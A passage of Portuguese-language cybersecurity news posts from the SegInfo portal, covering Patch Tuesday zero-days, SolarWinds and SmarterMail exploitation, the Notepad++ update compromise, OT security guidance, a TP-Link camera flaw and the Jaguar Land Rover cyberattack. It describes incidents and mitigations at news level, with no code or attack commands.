A redução das barreiras de entrada também contribui para esse avanço: agentes maliciosos reutilizam ferramentas vazadas, adotam playbooks consolidados e utilizam IA para automatizar operações. Com a evolução dos modelos multimodais, a expectativa é que tarefas complexas — como reconhecimento avançado e ataques sofisticados de ransomware — sejam cada vez mais automatizadas, tornando as ameaças mais rápidas e adaptativas.

Cadeias de suprimentos sob pressão crescente

Desde 2020, a IBM identificou um aumento de quase quatro vezes nos grandes comprometimentos de cadeias de suprimentos e terceiros. O movimento é impulsionado principalmente pela exploração de relações de confiança entre empresas, automações em pipelines de desenvolvimento e integrações SaaS.

Além disso, ferramentas de codificação baseadas em IA vêm acelerando o desenvolvimento de software — mas também podem introduzir código não validado ou vulnerável nos ambientes corporativos. Com isso, a pressão sobre pipelines, bibliotecas open source e ecossistemas de desenvolvimento tende a crescer ainda mais em 2026.

Outro fator relevante é o apagamento das fronteiras entre atores estatais e financeiramente motivados. Técnicas antes associadas exclusivamente a operações patrocinadas por Estados vêm sendo disseminadas em fóruns clandestinos e adotadas por grupos criminosos comuns, especialmente com o apoio da IA para reconhecimento e exploração.

O relatório da IBM reforça uma mensagem clara: as ameaças não são necessariamente novas, mas estão mais rápidas, automatizadas e acessíveis. Em um cenário onde vulnerabilidades conhecidas continuam sendo exploradas em larga escala, a adoção de uma postura proativa, com foco em gestão de vulnerabilidades, proteção de identidade e monitoramento contínuo, torna-se fundamental para reduzir riscos e fortalecer a resiliência cibernética.

Para saber mais, clique aqui.

The post IBM alerta: ataques impulsionados por IA avançam em 2026 enquanto falhas básicas expõem empresas appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

A Comissão Europeia voltou a defender o endurecimento das regras de proteção às infraestruturas críticas do bloco, diante do avanço de ameaças cibernéticas e híbridas no continente. O tema ganhou destaque durante a Munich Cyber Security Conference, onde autoridades europeias alertaram para a necessidade de uma postura menos permissiva frente a riscos digitais estratégicos.

Henna Virkkunen, vice-presidente executiva da Comissão Europeia, afirmou que a União Europeia não pode mais subestimar a capacidade de atores hostis de comprometer serviços essenciais por meio de ataques digitais. Segundo ela, os conflitos contemporâneos incorporam o ciberespaço como elemento central, frequentemente combinando invasões virtuais com sabotagens físicas, campanhas de desinformação e pressões econômicas coordenadas.

Cibersegurança como pilar da segurança europeia

A representante destacou que não há segurança nacional sem cibersegurança. Nos últimos anos, hospitais, redes de energia, órgãos públicos, cadeias de suprimentos e até processos eleitorais em Estados-membros foram alvo de ataques, evidenciando a vulnerabilidade de setores estratégicos.

O alerta ocorre em meio à proposta recente de revisão do Cybersecurity Act. A iniciativa busca ampliar o papel da agência europeia de cibersegurança (ENISA) e fortalecer mecanismos de mitigação de riscos nas cadeias de fornecimento de tecnologias da informação e comunicação consideradas críticas.

Entre as medidas sugeridas está a retirada progressiva de fornecedores classificados como de alto risco das infraestruturas nacionais sensíveis. A intenção é reduzir a exposição a dependências tecnológicas potencialmente exploráveis em cenários de tensão geopolítica.

Cadeias de fornecimento sob escrutínio

O debate não ocorre em um vácuo. Diversos países europeus já impuseram limitações a determinados fornecedores estrangeiros de equipamentos de telecomunicações, especialmente em componentes centrais das redes. Paralelamente, a dependência de grandes provedores tecnológicos externos também tem sido questionada, sobretudo após decisões políticas recentes fora do bloco que impactaram o acesso a serviços digitais.

Sem citar países específicos, Virkkunen ressaltou que a digitalização acelerada ampliou significativamente a superfície de ataque da Europa. Nesse contexto, a defesa cibernética passa a integrar a estratégia mais ampla de prontidão e defesa do bloco.

Novas frentes: drones, cabos submarinos e indústria europeia

A Comissão também vem estruturando planos de ação voltados à segurança de drones e à proteção de cabos submarinos — infraestruturas consideradas críticas para comunicações e operações estratégicas. Incidentes recentes reforçaram a necessidade de atenção redobrada a esses ativos.

Para Bruxelas, o ciberespaço deve ser tratado como um domínio estratégico central, inclusive sob a ótica militar. Isso implica investimento em capacidades próprias, estímulo ao desenvolvimento de uma indústria europeia de cibersegurança e avanço em tecnologias como computação de alto desempenho e Inteligência Artificial aplicada à defesa.

A mensagem é clara: diante da intensificação das ameaças híbridas, fortalecer a resiliência digital deixou de ser apenas uma pauta técnica e passou a ocupar posição estratégica na agenda de segurança da União Europeia.

Para saber mais, clique aqui.

The post União Europeia propõe reforço na proteção de infraestruturas críticas contra ameaças cibernéticas e híbridas appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

A Microsoft liberou nesta terça-feira (Patch Tuesday) um pacote de atualizações de segurança para corrigir 59 vulnerabilidades em seus produtos, incluindo seis falhas classificadas como zero-day que já vinham sendo exploradas ativamente.

Do total de vulnerabilidades corrigidas, cinco foram classificadas como Críticas, 52 como Importantes e duas como Moderadas. Entre as categorias mais recorrentes estão:

• – Elevação de privilégio (25)
• – Execução remota de código (12)
• – Falsificação (spoofing) (7)
• – Divulgação de informações (6)
• – Bypass de recursos de segurança (5)
• – Negação de serviço (3)
• – Cross-site scripting – XSS (1)

As atualizações também complementam três falhas já corrigidas no navegador Edge desde o Patch Tuesday de janeiro de 2026, incluindo uma vulnerabilidade moderada no Edge para Android (CVE-2026-0391, CVSS 6.5), que poderia permitir spoofing via rede por meio de uma representação enganosa de informações críticas na interface do usuário.

Seis zero-days exploradas ativamente

As principais preocupações deste mês envolvem seis vulnerabilidades já exploradas no mundo real:

• • CVE-2026-21510 (CVSS 8.8) – Falha no Windows Shell que permite a um atacante não autorizado contornar um recurso de segurança via rede.
• • CVE-2026-21513 (CVSS 8.8) – Falha no MSHTML Framework que possibilita o bypass de mecanismo de proteção por meio de interação com arquivos maliciosos.
• • CVE-2026-21514 (CVSS 7.8) – Uso de entradas não confiáveis em decisões de segurança no Microsoft Office Word, permitindo contornar proteções localmente.
• • CVE-2026-21519 (CVSS 7.8) – Vulnerabilidade de “type confusion” no Desktop Window Manager que possibilita elevação de privilégio local.
• • CVE-2026-21525 (CVSS 6.2) – Null pointer dereference no Windows Remote Access Connection Manager que pode resultar em negação de serviço local.
• • CVE-2026-21533 (CVSS 7.8) – Gerenciamento inadequado de privilégios no Windows Remote Desktop, permitindo elevação de privilégio local.

As três primeiras falhas foram identificadas por equipes internas da Microsoft e pelo Google Threat Intelligence Group (GTIG), sendo listadas como publicamente conhecidas no momento da divulgação. Até o momento, não há detalhes sobre como as vulnerabilidades estão sendo exploradas nem se fazem parte de uma mesma campanha.

Similaridades técnicas e riscos

Especialistas apontaram que as falhas CVE-2026-21513 e CVE-2026-21514 apresentam grande similaridade com a CVE-2026-21510. A principal diferença é o vetor de exploração:

• • A CVE-2026-21513 pode ser explorada por meio de arquivos HTML.
• • A CVE-2026-21514 exige um arquivo do Microsoft Office.

No caso da CVE-2026-21513, a falha afeta o MSHTML, componente central do Windows responsável por renderizar conteúdo HTML. Um arquivo especialmente criado pode contornar avisos de segurança do sistema e disparar ações perigosas com apenas um clique.

Já as vulnerabilidades CVE-2026-21519 e CVE-2026-21533 exigem que o invasor já tenha acesso prévio à máquina comprometida. Esse acesso pode ocorrer por meio de anexo malicioso, exploração de execução remota de código ou movimentação lateral dentro da rede.

Uma vez no sistema, o atacante pode escalar privilégios até o nível SYSTEM, o que permitiria desabilitar ferramentas de segurança, implantar novos malwares ou, em cenários mais graves, acessar credenciais sensíveis e comprometer todo o domínio.

A CrowdStrike, que reportou a CVE-2026-21533, informou que o exploit modifica chaves de configuração de serviço, substituindo-as por chaves controladas pelo invasor — o que pode permitir a criação de novos usuários no grupo de Administradores.

CISA inclui falhas no catálogo KEV

Diante da exploração ativa, a Agência de Segurança Cibernética e Infraestrutura dos EUA (CISA) adicionou as seis vulnerabilidades ao catálogo de Vulnerabilidades Exploradas Conhecidas (KEV).

Com isso, agências do governo federal norte-americano (FCEB) devem aplicar as correções até 3 de março de 2026.

Atualização de certificados do Secure Boot

O pacote também coincide com a distribuição de novos certificados do Secure Boot, substituindo os certificados originais de 2011, que expiram no fim de junho de 2026.

Os novos certificados serão instalados automaticamente via Windows Update. Caso o dispositivo não receba a atualização antes da expiração:

• • O sistema continuará funcionando normalmente;
• • Softwares já instalados continuarão operando;
• • Contudo, o equipamento entrará em um estado degradado de segurança, com limitação para receber futuras proteções em nível de boot.

Com o tempo, isso pode resultar em maior exposição a vulnerabilidades recém-descobertas e até problemas de compatibilidade com novos sistemas operacionais, firmwares e softwares que dependem do Secure Boot.

Reforço nas proteções padrão do Windows

A Microsoft também anunciou duas iniciativas para fortalecer as proteções padrão do Windows:

Windows Baseline Security Mode

Permitirá que o sistema opere, por padrão, com salvaguardas de integridade em tempo de execução, garantindo que apenas aplicativos, serviços e drivers devidamente assinados possam ser executados.

User Transparency and Consent

Inspirado no modelo de Transparência, Consentimento e Controle (TCC) do macOS, o recurso introduz uma abordagem mais consistente para decisões de segurança. O Windows passará a exibir avisos claros quando aplicativos tentarem acessar recursos sensíveis — como arquivos, câmera e microfone — ou instalar softwares adicionais.

Segundo a Microsoft, aplicativos e agentes de IA também deverão atender a padrões mais elevados de transparência, oferecendo maior visibilidade tanto para usuários quanto para administradores de TI.

Atenção redobrada das equipes de segurança

A presença de seis zero-days exploradas ativamente reforça a importância de aplicar as atualizações o mais rápido possível, especialmente em ambientes corporativos.

Organizações devem priorizar:

• • Atualização imediata de sistemas Windows e Office;
• • Monitoramento de possíveis tentativas de exploração;
• • Revisão de privilégios administrativos;
• • Verificação da aplicação correta dos novos certificados de Secure Boot.

Em um cenário de ameaças cada vez mais sofisticadas, a gestão eficiente de patches continua sendo uma das principais camadas de defesa contra ataques cibernéticos.

Para saber mais, clique aqui.

The post Microsoft corrige 59 vulnerabilidades, incluindo seis zero-days exploradas ativamente appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

Neste episódio do SegInfocast, recebemos Felipe Negri, CEO e sócio do PinBank, para uma conversa direta sobre os desafios do mercado financeiro em um cenário cada vez mais regulado, digital e exposto a riscos cibernéticos.

Ao longo do episódio, falamos sobre:
Inovação no setor financeiro e o papel das instituições;
Regulação do Banco Central como ponto de partida, não como fim;
Banking as a Service e a importância de manter foco no core do negócio;
Cibersegurança como ativo estratégico e diferencial competitivo;
Inteligência artificial, identidade e novos riscos cibernéticos.

Quer entender como preparar sua empresa para as novas exigências do Banco Central sem perder agilidade e inovação?
Acesse nosso conteúdo sobre adequação: https://clavis.com.br/lp-ebook-bacen-1/

The post SegInfocast #91 – Instituições financeiras na mira: cibersegurança como habilitadora de negócios appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

A Microsoft alertou que ataques direcionados a instâncias do SolarWinds Web Help Desk (WHD) expostas à internet podem ter explorado vulnerabilidades recém-corrigidas como zero-days, permitindo o acesso inicial dos invasores aos ambientes afetados.

De acordo com a empresa, os ataques fizeram parte de uma intrusão em múltiplas etapas observada em dezembro de 2025, na qual agentes maliciosos comprometeram implantações vulneráveis do WHD para executar comandos PowerShell, baixar e executar cargas adicionais no ambiente.

Apesar da investigação, a Microsoft afirma que não foi possível confirmar com precisão quais vulnerabilidades foram exploradas, já que os sistemas comprometidos estavam vulneráveis tanto a falhas antigas quanto a falhas mais recentes do SolarWinds conhecidas por serem exploradas ativamente.

Vulnerabilidades envolvidas

Segundo a análise, o produto comprometido apresentava falhas associadas aos seguintes CVEs:

• • CVE-2025-40551 e CVE-2025-40536, corrigidos em janeiro de 2026;
• • CVE-2025-26399, corrigido em setembro de 2025.

A vulnerabilidade CVE-2025-26399 é descrita como uma falha de execução remota de código (RCE) não autenticada via deserialização no componente AjaxProxy. Essa falha foi divulgada como um bypass de correções anteriores, relacionadas aos CVEs CVE-2024-28988 e CVE-2024-28986.

Já a CVE-2025-40551 tem a mesma raiz no componente AjaxProxy e também permite RCE não autenticada por deserialização de dados não confiáveis. Essa vulnerabilidade foi adicionada recentemente ao catálogo de vulnerabilidades exploradas ativamente (KEV) da CISA, reforçando seu nível de criticidade.

A CVE-2025-40536, por sua vez, consiste em um bypass de controles de segurança, que pode permitir a criação de instâncias válidas do AjaxProxy, viabilizando a exploração da CVE-2025-40551 para execução remota de código.

“Como os ataques ocorreram em dezembro de 2025 e os sistemas estavam vulneráveis tanto aos CVEs antigos quanto aos novos simultaneamente, não é possível confirmar de forma confiável qual vulnerabilidade foi usada para obter o acesso inicial”, destacou a Microsoft.

Técnicas de persistência e movimentação lateral

Após o comprometimento inicial, os atacantes foram observados obtendo persistência no ambiente por meio da implantação da ferramenta legítima de monitoramento e gerenciamento remoto (RMM) ManageEngine, além do estabelecimento de acessos reversos via SSH e RDP.

Também foi identificado o uso de uma tarefa agendada para iniciar uma máquina virtual QEMU com privilégios de sistema, explorando o ambiente virtualizado como técnica de evasão e para acesso SSH via encaminhamento de portas.

Em alguns casos, os invasores utilizaram DLL sideloading para acessar a memória do LSASS, com o objetivo de roubar credenciais. Credenciais de alto privilégio também foram empregadas em ataques do tipo DCSync, permitindo a solicitação de dados de senhas diretamente a controladores de domínio.

Recomendações de mitigação

A Microsoft recomenda que as organizações:

• • Atualizem imediatamente as instâncias do SolarWinds Web Help Desk;
• • Identifiquem e removam aplicações RMM não autorizadas;
• • Realizem a rotação de credenciais potencialmente comprometidas;
• • Isolem hosts afetados para conter a propagação do ataque.

Segundo a empresa, o incidente reforça um padrão recorrente e de alto impacto:

“Uma única aplicação exposta pode abrir caminho para o comprometimento completo do domínio quando vulnerabilidades não são corrigidas ou monitoradas adequadamente. Nesta intrusão, os atacantes recorreram fortemente a técnicas de living off the land, ferramentas administrativas legítimas e mecanismos de persistência de baixo ruído”, conclui a Microsoft.

Para saber mais, clique aqui.

The post Falhas recentes no SolarWinds podem ter sido exploradas como zero-days, alerta Microsoft appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

Uma vulnerabilidade crítica nos servidores de e-mail corporativo e colaboração SmarterTools SmarterMail está sendo ativamente explorada por cibercriminosos, segundo alerta da agência de segurança cibernética dos Estados Unidos, a CISA.

Há cerca de duas semanas, pesquisadores de segurança já haviam identificado a exploração de uma falha de bypass de autenticação no SmarterMail, utilizada por atacantes para redefinir senhas de contas administrativas e assumir o controle de instâncias vulneráveis. Na semana passada, a CISA incluiu essa falha em seu catálogo de Known Exploited Vulnerabilities (KEV), juntamente com um segundo problema explorado na mesma campanha.

Agora, a agência emitiu um novo alerta informando que uma terceira vulnerabilidade no SmarterMail também está sendo explorada ativamente. A falha é identificada como CVE-2026-24423, possui pontuação CVSS 9.3 e permite execução remota de código (RCE) sem autenticação, por meio da API ConnectToHub.

De acordo com a descrição técnica, a API processa requisições controladas por um servidor remoto, o que possibilita que atacantes definam parâmetros arbitrários de execução de comandos. Esses parâmetros são então repassados ao endpoint vulnerável, resultando na execução de comandos no sistema afetado, independentemente da plataforma.

Segundo um alerta do NIST, um invasor pode direcionar o SmarterMail para um servidor HTTP malicioso, que retorna um comando de sistema operacional fraudulento. Esse comando é executado automaticamente pela aplicação vulnerável.

A empresa VulnCheck aponta que a causa raiz do problema está no fato de a API ConnectToHub permitir explicitamente usuários anônimos e processar dados JSON enviados via requisições POST. Com isso, atacantes podem definir comandos de mount com parâmetros maliciosos e, ao executá-los, elevar privilégios em sistemas Linux.

Em 15 de janeiro, a SmarterTools lançou o build 9511 do SmarterMail, que corrige a CVE-2026-24423 e as duas vulnerabilidades anteriores já exploradas. A recomendação é que as organizações atualizem suas instâncias o quanto antes.

Na última quinta-feira, a CISA adicionou oficialmente a CVE-2026-24423 ao catálogo KEV e determinou que agências federais realizem a correção até 26 de fevereiro, alertando que a falha já está sendo utilizada por grupos de ransomware.

A agência também definiu um prazo semelhante para a correção da CVE-2025-11953, uma vulnerabilidade crítica de injeção de comandos no React Native, explorada ativamente desde dezembro.

Para saber mais, clique aqui.

The post Vulnerabilidade crítica no SmarterMail é explorada em ataques de ransomware appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

Pesquisadores de segurança identificaram que o recente comprometimento do mecanismo de atualização do Notepad++ está associado a uma operação de ciberespionagem conduzida pelo grupo conhecido como Lotus Blossom, também rastreado por outras comunidades de pesquisa como Lotus Panda ou Billbug. O incidente chama atenção por explorar a cadeia de distribuição de software como vetor inicial de ataque, resultando na entrega de um backdoor inédito, denominado Chrysalis, a alvos cuidadosamente selecionados.

O caso veio à tona após o próprio autor do Notepad++ informar que a infraestrutura responsável pelo serviço de atualização havia sido comprometida. De acordo com o relato, um servidor de hospedagem compartilhada foi acessado de forma indevida, permitindo que parte das solicitações legítimas de atualização fosse redirecionada, de maneira seletiva, para servidores sob controle dos atacantes. Nessas situações, usuários receberam instaladores maliciosos disfarçados como atualizações legítimas do software.

Análises técnicas indicam que a campanha não teve caráter massivo. Ao contrário, o redirecionamento do tráfego foi feito de forma direcionada, atingindo apenas sistemas considerados de interesse pelos operadores da ameaça. Esse padrão reforça o perfil de uma campanha de espionagem, voltada a alvos de alto valor e alinhada ao histórico de atuação do grupo Lotus Blossom.

Entre os setores tradicionalmente associados a atividades desse grupo estão organizações governamentais, empresas de telecomunicações, aviação, infraestrutura crítica e mídia, com registros de operações em países do Sudeste Asiático e, mais recentemente, da América Central.

O Notepad++ foi utilizado como vetor inicial para a entrega do Chrysalis, um backdoor até então desconhecido, capaz de fornecer persistência no ambiente comprometido e abrir caminho para atividades de coleta de informações e controle remoto. Segundo avaliações independentes, trata-se de uma ferramenta sofisticada, projetada para permanência prolongada no endpoint e difícil detecção por mecanismos tradicionais.

Em declaração à imprensa especializada, o autor do Notepad++, Don Ho, afirmou que não é possível confirmar oficialmente a autoria do ataque ou todos os detalhes técnicos do malware envolvido. Ainda assim, destacou que o modelo de comprometimento descrito por pesquisadores externos é compatível com o que foi observado durante a investigação do incidente, indicando um cenário plausível e tecnicamente consistente.

Embora a forma exata de acesso inicial à infraestrutura de distribuição ainda não tenha sido completamente esclarecida, há indícios de que, uma vez obtido esse acesso, os atacantes passaram a distribuir versões adulteradas do software por meio de instaladores no formato NSIS, amplamente utilizados e conhecidos por também serem explorados em campanhas avançadas de ameaça.

O incidente reforça um ponto crítico para organizações e usuários: ataques à cadeia de suprimentos de software continuam sendo uma das estratégias mais eficazes para contornar controles de segurança tradicionais. A exploração de mecanismos de atualização, em especial, amplia o impacto potencial do ataque e dificulta sua detecção precoce, tornando essenciais medidas adicionais de validação, monitoramento e resposta.

É nesse contexto que entram as recomendações da Clavis, com foco em mitigação imediata, investigação de possíveis comprometimentos e fortalecimento dos controles de segurança relacionados à distribuição e atualização de software.

Recomendações da Clavis

O incidente envolvendo o mecanismo de atualização do Notepad++ reforça os riscos associados a ataques à cadeia de suprimentos de software, especialmente quando falhas em processos de validação e distribuição são exploradas de forma direcionada.

No caso analisado, o comprometimento ocorreu na infraestrutura de atualização e não no código-fonte do software, o que evidencia a necessidade de controles adicionais sobre a integridade, autenticidade e monitoramento de processos de update — em especial em ambientes corporativos.

Com base nas informações publicamente disponíveis até o momento, a Clavis recomenda:

• • Atualização imediata para a versão mais recente do Notepad++ (>= v8.9.1), que inclui melhorias no mecanismo de atualização e validação de assinaturas;
• • Inventário e revisão de endpoints que utilizem versões anteriores, com atenção especial a sistemas que possuam atualização automática habilitada;
• • Análise de segurança aprofundada nos endpoints potencialmente expostos, priorizando a detecção de mecanismos de persistência, backdoors e execução de binários não autorizados;
• • Revisão dos controles de supply chain de software, incluindo políticas de validação de atualizações, verificação de assinaturas digitais e restrições à execução de instaladores fora de repositórios confiáveis;
• • Monitoramento contínuo e resposta a incidentes, garantindo visibilidade sobre comportamentos anômalos e capacidade de contenção rápida em caso de comprometimento.

Casos como esse demonstram que mecanismos legítimos de atualização continuam sendo alvos atrativos para campanhas avançadas de ameaça, reforçando a importância de uma abordagem estruturada de gestão de riscos, detecção e resposta em ambientes corporativos.

The post Ataque à atualização do Notepad++ é atribuído ao grupo de espionagem Lotus Blossom appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

A Cybersecurity and Infrastructure Security Agency (CISA), o National Cyber Security Centre do Reino Unido (NCSC-UK), o Federal Bureau of Investigation (FBI) e parceiros internacionais lançaram oficialmente os Secure Connectivity Principles for Operational Technology, um guia estratégico voltado a organizações que operam ambientes OT. A iniciativa foi liderada pelo NCSC-UK e tem como objetivo ajudar empresas a reduzir riscos associados a conectividades expostas ou inseguras, protegendo redes contra ameaças cibernéticas sofisticadas, incluindo atores patrocinados por Estados-nação.

Com a crescente interconectividade dos ambientes de OT — impulsionada por benefícios como análises em tempo real, monitoramento remoto e manutenção preditiva — também aumentam os riscos de intrusões cibernéticas capazes de causar danos físicos, impactos ambientais ou interrupções em serviços essenciais. O novo guia oferece um framework prático, com objetivos claros, para que operadores e proprietários de infraestruturas críticas possam projetar, implementar e manter conectividade segura em seus ambientes.

Segundo Nick Andersen, diretor assistente executivo de cibersegurança da CISA, a publicação reforça o compromisso da agência em atuar de forma colaborativa com parceiros nacionais e internacionais. “Ao fornecer orientações práticas para que organizações de OT projetem, protejam e gerenciem a conectividade de seus ambientes, fortalecemos a defesa da infraestrutura crítica contra ameaças cibernéticas maliciosas e patrocinadas por Estados”, destacou. Andersen também reforçou a importância da adoção de princípios de secure by design por fabricantes e integradores de dispositivos OT, como forma mais eficaz de reduzir riscos desde a origem.

O CTO do NCSC, Ollie Whitehouse, ressaltou que a segurança cibernética deve ser tratada como um requisito fundamental para garantir segurança física, disponibilidade e continuidade de serviços. “Desenvolvida em conjunto com parceiros internacionais e com ampla colaboração da indústria, a nova orientação oferece um framework claro e prático para reduzir a superfície de ataque e aumentar a resiliência dos sistemas conectados”, afirmou. Whitehouse recomendou que profissionais de OT em todo o mundo adotem os oito princípios definidos no guia para apoiar decisões estratégicas baseadas em segurança.

Já Brett Leatherman, diretor assistente de cibersegurança do FBI, destacou que os sistemas de tecnologia operacional sustentam silenciosamente serviços essenciais utilizados diariamente pela população. “A conectividade segura desses sistemas é uma questão de importância nacional. Este guia conjunto reforça que ambientes OT são particularmente vulneráveis e cada vez mais visados, tornando a mitigação rápida e a defesa colaborativa fundamentais”, explicou.

A CISA e seus parceiros internacionais recomendam que organizações avaliem seus ambientes de conectividade em OT e implementem as medidas de mitigação propostas no guia, fortalecendo a proteção da infraestrutura crítica frente a ameaças cibernéticas cada vez mais oportunistas e avançadas.

Para saber mais, clique aqui.

The post CISA e parceiros internacionais lançam princípios de segurança para conectividade em OT appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

Um alerta conjunto emitido por agências de cibersegurança ocidentais chama a atenção para a escalada das ameaças digitais direcionadas à tecnologia operacional (OT), responsável por sustentar sistemas industriais e infraestruturas críticas em todo o mundo.

O aviso acompanha a publicação de novas orientações lideradas pelo National Cyber Security Centre (NCSC) do Reino Unido, órgão ligado ao serviço de inteligência GCHQ, que estabelece princípios para a conexão segura de equipamentos industriais à internet, como sistemas de controle industrial, sensores e outros serviços críticos.

Essas tecnologias estão no centro de infraestruturas essenciais, incluindo centrais de geração de energia, estações de tratamento de água, linhas de produção industrial e redes de transporte. Historicamente isolados, muitos desses sistemas passaram a ser monitorados e gerenciados remotamente, ampliando a eficiência operacional — mas também a superfície de ataque explorada por agentes maliciosos.

Segundo as agências envolvidas na elaboração das orientações, um número crescente e cada vez mais diverso de atores tem direcionado ataques a ambientes industriais, que vão desde grupos de ransomware até cibercriminosos apoiados por Estados-nação.

“As conexões OT expostas e inseguras são alvos conhecidos tanto de atores oportunistas quanto de adversários altamente sofisticados”, destaca o documento, que relembra um alerta conjunto emitido em junho de 2023 sobre operações cibernéticas patrocinadas pelo Estado chinês.

O material também faz referência a um alerta recente da Cybersecurity and Infrastructure Security Agency (CISA) dos Estados Unidos, atualizado no mês passado, indicando que hacktivistas pró-Rússia têm conduzido ataques oportunistas contra infraestruturas críticas em diferentes países.

O guia foi coassinado por diversas entidades internacionais, incluindo a CISA e o FBI, os centros nacionais de cibersegurança dos Países Baixos e da Alemanha, além de parceiros da aliança Five Eyes, que reúne Austrália, Canadá e Nova Zelândia.

Entre as principais recomendações estão a segmentação de redes, o uso de autenticação forte, a monitorização contínua e a redução ao mínimo dos acessos remotos, com o objetivo de prevenir ataques disruptivos capazes de afetar serviços essenciais e causar impactos no mundo físico.

A urgência dessas medidas é reforçada por incidentes recentes. Em novembro do ano passado, a Recorded Future News revelou que cibercriminosos realizaram cinco ataques contra fornecedores de água potável no Reino Unido desde o início de 2024. As informações constam em relatórios encaminhados ao regulador do setor e parcialmente divulgados com base na legislação de acesso à informação.

Embora nenhum dos ataques tenha comprometido diretamente o abastecimento de água, eles afetaram as organizações responsáveis pelo serviço. Trata-se do maior número de incidentes registrados em um intervalo de dois anos, reforçando os alertas das autoridades britânicas sobre o aumento das ameaças cibernéticas às infraestruturas críticas do país.

Em comunicado que acompanha a divulgação das orientações, o diretor de tecnologia do NCSC, Ollie Whitehouse, destacou que é “vital que a cibersegurança seja tratada como um requisito fundamental para sustentar a segurança física, a continuidade dos serviços e a disponibilidade operacional”.

“As novas orientações do NCSC, desenvolvidas em conjunto com parceiros internacionais e com ampla colaboração da indústria, oferecem um quadro claro e prático para projetar e manter conexões seguras, reduzir a superfície de ataque e fortalecer a resiliência”, afirmou.

Whitehouse acrescentou ainda que as autoridades “recomendam fortemente que profissionais de OT em todo o mundo sigam os oito princípios-chave”, de modo a tomar decisões de segurança mais informadas, proteger serviços críticos e reforçar a confiança em sistemas cada vez mais interconectados.

Para saber mais, clique aqui.

The post Agências ocidentais alertam para o aumento das ameaças à tecnologia operacional industrial appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

A TP-Link corrigiu recentemente uma vulnerabilidade grave que poderia permitir que invasores assumissem o controle de mais de 32 modelos profissionais de câmeras de vigilância das linhas VIGI C e VIGI InSight.

Identificada como CVE-2026-0629 e classificada com alta severidade, a falha foi detalhada em um comunicado oficial publicado pela fabricante na última semana. O problema está relacionado a um bypass de autenticação no recurso de recuperação de senha da interface web local das câmeras.

De acordo com a TP-Link, a vulnerabilidade “permite que um invasor presente na rede local redefina a senha de administrador sem qualquer verificação, por meio da manipulação do estado do lado do cliente”, o que possibilita acesso administrativo completo ao dispositivo.

A falha foi descoberta por Arko Dhar, cofundador e CTO da empresa de cibersegurança para IoT Redinent Innovations. Em entrevista ao portal SecurityWeek, Dhar explicou que um atacante poderia explorar a vulnerabilidade para obter acesso total à câmera, incluindo o feed de vídeo e todas as demais funcionalidades.

O pesquisador alertou ainda que a exploração poderia ocorrer de forma remota e que, no momento da descoberta, em outubro de 2025, ele identificou mais de 2.500 câmeras expostas à internet potencialmente vulneráveis em todo o mundo. No entanto, a análise considerou apenas um dos modelos afetados, o que indica que o número real de dispositivos expostos pode ser significativamente maior.

As câmeras da linha VIGI da TP-Link são utilizadas por organizações em mais de 36 países e regiões, com forte presença na Europa, Sudeste Asiático e Américas.

Embora seja comum que agentes maliciosos explorem vulnerabilidades em produtos da TP-Link, o catálogo de Vulnerabilidades Exploradas Conhecidas (KEV) da CISA lista atualmente cinco falhas exploradas em ataques reais — todas relacionadas a roteadores e repetidores de sinal da marca, e não a câmeras de vigilância.

Ainda assim, ataques explorando falhas em câmeras de diferentes fabricantes são recorrentes no ambiente de ameaças. Por isso, especialistas alertam que organizações não devem ignorar a vulnerabilidade recém-divulgada e devem garantir que seus dispositivos estejam atualizados com as correções mais recentes.

Para saber mais, clique aqui.

The post TP-Link corrige falha crítica que expunha câmeras VIGI a ataques remotos appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

A Jaguar Land Rover (JLR) registrou uma forte retração em suas vendas no terceiro trimestre do ano fiscal de 2026. De acordo com o relatório trimestral mais recente da montadora, o volume de vendas no atacado caiu 43,3% em comparação com o mesmo período do ano anterior, totalizando 59.200 unidades — número que exclui a joint venture Chery JLR China.

A queda expressiva é atribuída principalmente a um ataque cibernético ocorrido no início do trimestre, que afetou diretamente as operações da empresa, além da descontinuação estratégica de modelos antigos da Jaguar, como parte da preparação para o lançamento de uma nova geração de veículos.

Vendas caem em todos os principais mercados

O impacto também foi sentido no varejo. As vendas ao consumidor final recuaram 25,1% na comparação anual, alcançando 79.600 unidades no trimestre. Todos os principais mercados globais da JLR apresentaram retração.

Na América do Norte, os volumes de atacado despencaram 64,4%. A Europa registrou queda de 47,6%, enquanto a China teve redução de 46%. O Reino Unido foi o mercado menos afetado, com uma diminuição marginal de 0,9% nos volumes de atacado.

Ataque cibernético afetou produção e logística

Segundo a Jaguar Land Rover, a produção só começou a retornar aos níveis normais em meados de novembro, semanas após o incidente cibernético. Além da paralisação inicial, a empresa enfrentou atrasos adicionais na distribuição dos veículos para os mercados globais, o que contribuiu para a redução dos volumes no trimestre.

Outro fator que agravou o cenário foi o aumento das tarifas impostas pelos Estados Unidos sobre exportações de veículos, elevando custos e dificultando ainda mais o desempenho comercial da montadora.

Modelos premium seguem como pilar da empresa

Apesar do trimestre desafiador, os modelos Range Rover, Range Rover Sport e Defender continuam sendo os principais pilares da JLR. Juntos, eles responderam por 74,3% do volume total de vendas no atacado, reforçando a estratégia da empresa de focar em veículos premium e de maior margem.

A Jaguar Land Rover informou que divulgará os resultados financeiros completos do terceiro trimestre do ano fiscal de 2026 em fevereiro de 2026, quando devem ser apresentados mais detalhes sobre os impactos do ataque cibernético e as perspectivas para os próximos meses.

Para saber mais, clique aqui.

The post Ataque cibernético provoca queda de 43% nas vendas da Jaguar Land Rover appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

A Covenant Health, Inc., organização de saúde sediada em Andover, no estado de Massachusetts (EUA), comunicou às autoridades que uma violação de dados identificada em maio de 2025 impactou mais de 478 mil indivíduos.

A instituição oferece serviços de saúde em mais de uma dezena de unidades distribuídas pelos estados de Massachusetts, Maine, New Hampshire, Pensilvânia, Rhode Island e Vermont.

